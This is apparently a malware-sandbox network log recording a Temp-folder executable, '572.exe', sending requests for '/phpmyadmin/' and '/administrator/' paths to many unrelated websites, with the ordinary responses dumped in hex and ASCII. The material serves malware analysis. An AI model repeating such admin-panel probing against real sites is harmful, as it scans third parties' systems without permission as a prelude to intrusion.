                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1252INData Raw: 36 36 41 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 59 59 35 72 38 77 58 75 44 58 70 6c 6c 4b 42 4d 62 41 39 62 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UYY5r8wXuDXpllKBMbA9bg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC397INData Raw: 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                75192.168.2.655137185.78.166.130443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC203OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC229INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                76192.168.2.655183142.250.105.84443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC842INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1252INData Raw: 36 36 41 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 46 71 62 65 53 57 4b 4c 5a 68 44 50 6d 58 63 43 78 34 54 77 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="eFqbeSWKLZhDPmXcCx4TwQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC397INData Raw: 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                77192.168.2.655176172.67.184.59443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: hartico.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC638INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://hartico.tv/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FQSUnENUq0LwXe%2B2vEmFOztypN%2BplkC%2BxYtTzGE27hQX2Uk9EkkjZSfL5Ex79O0G%2BN7e4iGtvwrLABl%2BVM2lpB3nycF3prt1e5fBKxsD2W6NujcSnSJl1Jn6iBpImQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb77bbd1678d-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                78192.168.2.656007184.25.164.103443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC186OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: store.steampowered.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC233INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://store.steampowered.com/
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=10368000
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                79192.168.2.65530347.251.24.188443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: cjdropshipping.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC728INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 39
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: INGRESSCOOKIE=1707131693.904.98.256658|f85a63221c8fd9b049d9a82e34821ae3; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                set-cookie: csrfToken=jsNB62ashjmVJxyLb82eeJUD; path=/
                                                                                                                                                                                                                                                                                                                                                                set-cookie: lng=en; path=/; expires=Fri, 01 Jan 3030 00:00:00 GMT; domain=.cjdropshipping.com
                                                                                                                                                                                                                                                                                                                                                                set-cookie: language=en|en; path=/; expires=Fri, 01 Jan 3030 00:00:00 GMT; domain=.cjdropshipping.com
                                                                                                                                                                                                                                                                                                                                                                Location: /404
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                x-download-options: noopen
                                                                                                                                                                                                                                                                                                                                                                x-readtime: 11
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15724800; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC39INData Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 2f 34 30 34 22 3e 2f 34 30 34 3c 2f 61 3e 2e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Redirecting to <a href="/404">/404</a>.


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                80192.168.2.65514836.255.71.45443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC176OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: instructory.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC325INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                content-length: 66424
                                                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                x-powered-by: Express
                                                                                                                                                                                                                                                                                                                                                                etag: W/"10378-RHQJPMOxcO0kg0io8UC7Sw6sNcA"
                                                                                                                                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                cache-control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC5262INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 2f 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 49 6e 73 74 72 75 63 74 6f 72 79 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 54 65 61 63 68 69 6e 67 2c 20 49 6e 73 74 72 75 63 74 69 6f 6e 2c 20 45 2d 4c 65 61 72 6e 69
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <base href="/"> <title>Instructory</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="keywords" content="Teaching, Instruction, E-Learni
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC8311INData Raw: 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 31 34 32 31 35 33 37 32 32 2d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 20 20 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 20 20 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 55 41 2d 31 34 32 31 35 33 37 32 32 2d 31 27 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: letagmanager.com/gtag/js?id=UA-142153722-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-142153722-1'); </script>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC8388INData Raw: 6e 74 2d 73 63 32 33 31 5d 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 68 65 61 64 65 72 2d 6d 61 69 6e 2d 73 65 63 74 69 6f 6e 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 32 33 31 5d 20 20 20 2e 68 65 61 64 65 72 2d 6d 65 6e 75 2d 6c 69 6e 6b 73 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 32 33 31 5d 20 20 20 2e 6d 61 69 6e 2d 6d 65 6e 75 2d 6c 69 6e 6b 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 32 33 31 5d 20 20 20 2e 70 72 6f 66 69 6c 65 2d 61 76 61 74 61 72 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 32 33 31 5d 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 70 78 7d 2e 68 65 61 64 65 72 2d 6d 61 69 6e 2d 73 65 63 74 69 6f 6e 5b 5f 6e 67 63 6f 6e 74 65 6e 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: nt-sc231]{color:#fff}.header-main-section[_ngcontent-sc231] .header-menu-links[_ngcontent-sc231] .main-menu-link[_ngcontent-sc231] .profile-avatar[_ngcontent-sc231]{padding-left:25px;padding-right:0;border-radius:50px}.header-main-section[_ngcontent
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC16320INData Raw: 78 3b 6c 65 66 74 3a 31 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 77 69 64 74 68 3a 33 35 70 78 7d 2e 63 75 73 74 6f 6d 2d 74 6f 6f 6c 74 69 70 73 2e 61 63 63 6f 75 6e 74 2d 62 61 6c 61 6e 63 65 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 32 33 31 5d 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 74 6f 70 3a 2d 34 34 70 78 3b 77 69 64 74 68 3a 31 30 30 70 78 3b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 30 70 78 3b 6c 65 66 74 3a 30 7d 2e 63 75 73 74 6f 6d 2d 74 6f 6f 6c 74 69 70 73 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 32 33 31 5d 3a 62 65 66 6f 72 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 6c 65 66 74 3a 34 30 25 3b 62 6f 74 74 6f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: x;left:1px;text-align:center;width:35px}.custom-tooltips.account-balance[_ngcontent-sc231]{font-size:13px;text-align:center;top:-44px;width:100px;padding:2px 10px;left:0}.custom-tooltips[_ngcontent-sc231]:before{position:absolute;content:"";left:40%;botto
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC7446INData Raw: 61 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 39 31 5d 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 31 66 31 66 31 7d 66 6f 6f 74 65 72 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 39 31 5d 20 20 20 2e 74 65 78 74 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 39 31 5d 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 63 6f 6c 6f 72 3a 23 66 38 65 61 62 38 7d 75 6c 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 39 31 5d 20 20 20 6c 69 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 39 31 5d 20 20 20 61 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 39 31 5d 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 40 6d 65 64 69 61 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: a[_ngcontent-sc91]:hover{color:#f1f1f1}footer[_ngcontent-sc91] .text[_ngcontent-sc91]{padding-bottom:10px;font-size:13px;font-weight:300;color:#f8eab8}ul[_ngcontent-sc91] li[_ngcontent-sc91] a[_ngcontent-sc91]{color:#fff;text-decoration:none}@media
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC8890INData Raw: 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 31 39 5d 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2d 31 2e 31 73 7d 2e 73 6b 2d 77 61 76 65 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 31 39 5d 20 20 20 2e 73 6b 2d 72 65 63 74 33 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 31 39 5d 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2d 31 73 7d 2e 73 6b 2d 77 61 76 65 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 31 39 5d 20 20 20 2e 73 6b 2d 72 65 63 74 34 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 31 39 5d 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2d 2e 39 73 7d 2e 73 6b 2d 77 61 76 65 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 31 39 5d 20 20 20 2e 73 6b 2d 72 65 63 74 35 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 31 39 5d 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ngcontent-sc19]{animation-delay:-1.1s}.sk-wave[_ngcontent-sc19] .sk-rect3[_ngcontent-sc19]{animation-delay:-1s}.sk-wave[_ngcontent-sc19] .sk-rect4[_ngcontent-sc19]{animation-delay:-.9s}.sk-wave[_ngcontent-sc19] .sk-rect5[_ngcontent-sc19]{animation-d
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC48INData Raw: 69 6e 65 20 54 65 61 63 68 65 72 20 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 39 31 3d 22 22 3e 3c 61 20 5f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ine Teacher </a></li><li _ngcontent-sc91=""><a _
